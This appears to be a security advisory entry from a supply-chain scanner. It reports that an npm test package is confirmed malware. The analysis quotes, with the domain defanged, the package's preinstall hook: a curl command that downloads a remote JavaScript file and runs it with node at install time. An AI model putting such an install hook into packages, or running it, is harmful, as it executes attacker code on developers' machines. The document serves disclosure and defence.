LWA-2026-5828 MAL-2026-6266 ↗ confirmed malware

test-package-sajsdkashdj@2.1.6

Malicious code in test-package-sajsdkashdj (npm)

T1059.007 · JavaScriptT1105 · Ingress Tool Transfer

Analysis

Package ships no code in the tarball but contains a preinstall lifecycle hook that executes 'curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js' at install time. This downloads a remote JavaScript payload from poc[.]amanrawat[.]com and immediately executes it, a remote-code-download-and-execute supply-chain attack.

analyzed by
Leitwacht
first seen
Jun 22, 2026, 07:18 AM
analyzed
Jun 22, 2026, 07:19 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.